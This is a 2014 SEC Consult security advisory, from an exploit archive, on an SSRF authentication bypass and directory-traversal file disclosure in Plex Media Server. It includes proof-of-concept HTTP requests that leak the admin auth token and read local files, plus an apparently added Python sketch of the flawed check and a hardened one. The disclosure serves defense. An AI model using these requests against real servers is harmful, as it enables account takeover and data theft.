Plex Media Server 0.9.9.2.374-aa23a69 Bypass / File Disclosure

Posted Feb 28, 2014
Authored by S. Viehbock | Site sec-consult.com

Plex Media Server versions 0.9.9.2.374-aa23a69 and below suffer from authentication bypass and local file disclosure vulnerabilities.

tags | exploit, local, vulnerability
SHA-256 | 5056a9a5be5beee1b56ca5f4a45fd08b7e9f849a4edabf46ffd88ef7a0b91dcc

SEC Consult Vulnerability Lab Security Advisory < 20140228-1 >
=======================================================================
title: Authentication bypass (SSRF) and local file disclosure
product: Plex Media Server
vulnerable version: <=0.9.9.2.374-aa23a69
fixed version: >=0.9.9.3
impact: Critical
homepage: http://www.plex.tv
found: 2014-02-06
by: Stefan Viehböck
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================

Vendor/product description:
-----------------------------
"Plex is a media player system consisting of a player application with a
10-foot user interface and an associated media server. It is available for
Mac OS X, Linux, and Microsoft Windows."

URL: https://en.wikipedia.org/wiki/Plex_(software)


Vulnerability overview/description:
-----------------------------------
1. Authentication bypass / Server Side Request Forgery (SSRF)
The Plex Media Server "/system/proxy" functionality fails to properly validate
pre-authentication user requests. This allows unauthenticated attackers to make
the Plex Media Server execute arbitrary HTTP requests.

By requesting content from 127.0.0.1 an attacker can bypass all authentication
and execute commands with administrative privileges.

2. Unauthenticated local file disclosure
Because of insufficient input validation, arbitrary local files can be
disclosed. Files that include passwords and other sensitive information can
be accessed.


Plex "Remote" servers (thousands of them can be found via Shodan and Google,
none of them were accessed) are affected by both vulnerabilities as well.


Proof of concept:
-----------------
1. Authentication bypass / Server Side Request Forgery (SSRF)
The following GET request bypasses the webserver whitelist.

GET /system/proxy HTTP/1.1
Host: <PLEX_WAN_HOST>
X-Plex-Url: http://localhost:32400/myplex/account?IRRELEVANT=
X-Plex-Url: http://my.plexapp.com/


The last X-Plex-Url header value "http://my.plexapp.com/" is contained in
the whitelist (Regex) and passes validation. The request is then processed by
the actual request handler in the backend webserver (Python). Here both header
values are concatenated using a comma. This way the actual URL that is
requested is controlled by the first X-Plex-Url value.
By appending a query parameter (called IRRELEVANT) to the first value, the
comma and the second X-Plex-Url value end up inside that parameter's value and
are ignored by the backend.

This results in the following request (made by Plex Media Server):

GET /myplex/account?IRRELEVANT=,http://my.plexapp.com/ HTTP/1.1
Host: localhost:32400
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)
Connection: close
Accept: */*
Accept-Encoding: gzip


The response for this request is passed to the attacker and includes the
authToken value ("master token"), which can be used to impersonate legitimate
Plex users. Of course other administrative actions can be performed as well.

<?xml version="1.0" encoding="UTF-8"?>
<MyPlex authToken="<REMOVED>" username="<REMOVED>" mappingState="mapped" mappingError="" mappingErrorMessage="1" signInState="ok" publicAddress="1" publicPort="9415" privateAddress="1" privatePort="32400" subscriptionFeatures="cloudsync,pass,sync" subscriptionActive="1" subscriptionState="Active">
</MyPlex>
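The validation gap described above, modelled as an added example (not SEC Consult's or Plex's code): a front-end regex that only inspects the last header value, a backend that joins repeated header values with a comma, and a hardened check that validates the single value actually fetched. The allowlist regex, the allowed host set and the root-cause details of the real implementation are assumptions; only the two header values come from the advisory.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed allowlist regex standing in for the real one (not on the page):
# a prefix match on the trusted Plex host.
ALLOWED_URL_RE = re.compile(r"^https?://my\.plexapp\.com/")
ALLOWED_HOSTS = {"my.plexapp.com"}

# The two X-Plex-Url values from the advisory's proof of concept.
POC_HEADERS = [
    "http://localhost:32400/myplex/account?IRRELEVANT=",
    "http://my.plexapp.com/",
]

def frontend_passes(header_values):
    """Front-end style check: only the last X-Plex-Url value is validated."""
    return bool(ALLOWED_URL_RE.match(header_values[-1]))

def backend_effective_url(header_values):
    """Backend style merge: repeated headers are joined with a comma, so the
    first value decides which host is actually contacted."""
    return ",".join(header_values)

def effective_host(header_values):
    """Host the backend would really connect to for the merged value."""
    return urlsplit(backend_effective_url(header_values)).hostname

def hardened_check(header_values):
    """Validate the value that will actually be fetched: exactly one header,
    http(s) only, parsed host must equal an allowlisted name, and an IP
    literal must be globally routable (defence in depth against loopback)."""
    if len(header_values) != 1:
        return False
    parts = urlsplit(header_values[0])
    host = parts.hostname  # lowercased, userinfo and port stripped
    if parts.scheme not in ("http", "https") or not host:
        return False
    try:
        if not ipaddress.ip_address(host).is_global:
            return False
    except ValueError:
        pass  # a DNS name, not an IP literal
    return host in ALLOWED_HOSTS
```

The point to take from running it: the front-end check and the backend fetch disagree about which URL is in play, so the check must be applied to the merged, parsed value, not to one raw header.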


A video demonstrating this issue has been released by SEC Consult:
http://www.youtube.com/watch?v=f99fm4QU9u8


2. Unauthenticated local file disclosure
The following requests show different functionality that is vulnerable to
directory traversal:

GET /manage/..\..\..\..\..\..\..\..\..\..\secret.txt HTTP/1.1
Host: <HOST>

GET /web/..\..\..\..\..\..\..\..\..\..\secret.txt HTTP/1.1
Host: <HOST>

GET /:/resources/..\..\..\..\..\..\..\..\..\..\secret.txt HTTP/1.1
Host: <HOST>

The /manage/ and /web/ handlers can be exploited without prior authentication.
This vulnerability was confirmed on Windows.



Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in Plex Media Server version
0.9.9.2.374-aa23a69.


Vendor contact timeline:
------------------------
2014-02-09: Contacting vendor through elan@plexapp.com and requesting
encryption keys.
2014-02-10: Vendor provides encryption keys.
2014-02-10: Sending advisory and proof of concept exploit.
2014-02-10: Vendor acknowledges receipt of advisory.
2014-02-17: Requesting status update.
2014-02-17: Vendor provides release timeline.
2014-02-20: Vendor releases fixed version (0.9.9.3).
2014-02-21: Requesting clarification regarding fixed version.
2014-02-21: Vendor provides further information about fixed version and
other reported vulnerabilities.
2014-02-28: SEC Consult releases coordinated security advisory.


Solution:
---------
Update to a more recent version of Plex Media Server (e.g. 0.9.9.5).


Workaround:
-----------
No workaround available.


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Interested in working with the experts of SEC Consult?
Write to career@sec-consult.com

EOF Stefan Viehböck / @2014